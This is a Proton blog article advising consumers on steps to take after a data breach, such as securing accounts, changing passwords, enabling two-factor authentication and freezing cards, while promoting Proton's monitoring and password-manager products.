Proton

What to do if your data is leaked?

In response to the growing number of data breaches, Proton Mail offers a feature to paid subscribers called Dark Web Monitoring(new window). Our system checks if your credentials or other data have been leaked to illegal marketplaces and alerts you if so. Often a quick reaction to a data breach can protect your digital identity and prevent any losses.

The impact a breach can have on your life depends greatly on the type of information that was exposed and to whom.

There are two general classes of data breaches: those where the service that leaked your information is known, and those where it is not. Massive data breaches like those that have occurred for LinkedIn(new window), Facebook(new window), and X.com(new window) pose a different set of problems to those where a set of email/password combinations (combo lists) are sold or given away online by hackers.

This article includes general recommendations to mitigate the damage if your data leaks in a variety of scenarios. If you use Proton Mail’s Dark Web Monitoring service, we will give you actionable advice along with any breach notification you receive.

What is a data breach?

A data breach is when confidential, sensitive, or protected information is accessed or disclosed without authorization. This can involve the unintended release of personal data, such as social security numbers, credit card details, personal health information, or other personally identifiable information (PII). Data breaches can result from cybersecurity attacks, such as hacking or phishing, as well as from internal leaks or failures to secure data adequately.

Steps to take after a data breach

If the source of a data breach is known, you should immediately go to the service and check for any signs of unauthorized activity on your accounts, such as difficulty logging in, unexpected changes to security settings, receiving unfamiliar messages or notifications from your account, logins from unusual locations or at odd times, and unauthorized money transfers or purchases from your online accounts.

Some general steps to follow to secure a breached service include:

  1. If you’re unable to log in to the account, contact the provider’s customer support to try to regain access.
  2. If you have access, ensure your security settings, such as your recovery email, have not been changed. If they have, change them back.
  3. Change your password and use a password manager such as Proton Pass(new window).
  4. Log all devices and apps out of your account.
  5. Set up two-factor authentication(new window) (2FA).
  6. If the breached service is an email provider, it’s important to review your email filtering and forwarding rules. Criminals often establish forwarding rules on compromised email accounts to receive copies of all incoming emails, enabling them to intercept 2FA codes or reset passwords, for instance.
  7. If the service is a communication system or social network more generally, it can be a good idea to notify contacts that you have been breached and for them to watch out for suspicious messages and posts.

Dealing with the aftermath of a data leak

Even if you manage to secure a breached account, your email address, password, credit card number, physical address, and other information could have been leaked at the same time.

While all leaked information has some level of potential damage, some information is clearly more valuable than others, in particular:

  • Email addresses: Your email address is your online identity(new window), the passport all your accounts ask for when you log in. However, if your email address is all that’s exposed, you should be safe (hackers will still need to try to brute force your password to access your account). 

You should:

  • Remain vigilant for phishing emails, especially those that may arrive sometime after the breach becomes public knowledge. Look out for senders impersonating services that write to you regarding “resetting passwords”, “claiming compensation”, or “missed deliveries’’. These and urgent requests to act immediately or within a limited timeframe are red flags.
  • Enabling 2FA is an excellent way to protect your account from attackers because even if they obtain your password they will still be unable to enter your account without an additional piece of information on your device.
  • Use hide-my-email aliases(new window) when signing up to sites to protect your identity.
  • Passwords: Exposed passwords, login credentials, or encryption keys can enable unauthorized entry into your accounts, potentially resulting in additional security breaches and data theft. While plaintext passwords are generally more severe in nature, some websites may store passwords using weak hashing methods like MD5, which can also leave your passwords vulnerable to attack. Conversely, passwords leaked from websites where passwords were encrypted or hashed using stronger algorithms such as SHA256 or bcrypt will inherently offer greater resistance to attacks.
    Therefore, if plaintext or weakly hashed passwords have been exposed, you must change them immediately. We strongly recommend using a password manager, such as Proton Pass(new window), and 2FA(new window) wherever possible.
  • Credit card numbers: If your credit card number is leaked, you should put a hold on it immediately by calling the emergency number on the back of the card. It is also worth paying attention to your bank accounts and credit card statements and reporting any fraudulent transactions as soon as possible.
    If the source of the data breach is known, they will often provide subscriptions to credit monitoring software such as Experian so that you can mitigate financial risks.
  • Phone numbers: This can lead hackers to target you with phishing text messages, trying to catch you when you’re tired or not paying attention. You can protect yourself from spam calls in the UK with the Telephone Preference Service(new window) or in the US with the National Do Not Call Registry(new window). Other countries likely have similar services, which you can search for online. In addition, be wary of phishing attempts.
  • Social Security numbers: Social Security numbers are an important piece of information, particularly in the US, and can be used along with your name, address, and date of birth to set up credit cards or take out loans in your name. If you find out your Social Security number has been stolen, you should immediately report the theft to identitytheft.gov(new window), place a credit freeze, and add a fraud alert.

Though not exhaustive, this list covers the most commonly breached information. With almost 4,000 data breaches of 1.8 billion records happening in February 2024 alone, criminals are able to build up information about users across breaches to construct profiles containing not only your email addresses and passwords, but also your occupation, past employment, marital status, and more, making it easier to carry out more sophisticated phishing attacks. For example, this tool(new window) allows you to visualize your breach profile here.

Use better encryption to prevent data leaks

Many data breaches could be prevented if more online services used end-to-end encryption. At Proton, this form of encryption is at the heart of our security architecture. Whether it’s protecting your emails and attachments in Proton Mail or securing your files in Proton Drive, your data is encrypted on your device before uploading to our servers. That way, if hackers ever were to gain access to our systems, your information would remain encrypted because only you can unlock your data with your private key.

Learn more about Proton’s end-to-end encryption(new window)

Related articles

A cover image for a blog describing the next six months of Proton Pass development which shows a laptop screen with a Gantt chart
en
Take a look at the upcoming features and improvements coming to Proton Pass over the next several months.
The Danish mermaid and the Dutch parliament building behind a politician and an unlocked phone
en
We searched the dark web for Danish, Dutch, and Luxembourgish politicians’ official email addresses. In Denmark, over 40% had been exposed.
Infostealers: What they are, how they work, and how to protect yourself
en
Discover insights about what infostealers are, where your stolen information goes, and ways to protect yourself.
Mockup of the Proton Pass app and text that reads "Pass Lifetime: Pay once, access forever"
en
Learn more about our exclusive Pass + SimpleLogin Lifetime offer. Pay once and enjoy premium password manager features for life.
A cover image for a blog announcing that Pass Plus will now include premium SimpleLogin features
en
We're changing the price of new Pass Plus subscriptions, which now includes access to SimpleLogin premium features.
Infinity symbol in purple with the words "Call for submissions" and "Proton Lifetime Fundraiser 7th Edition"
en
It’s time to choose the organizations we should support for the 2024 edition of our annual charity fundraiser.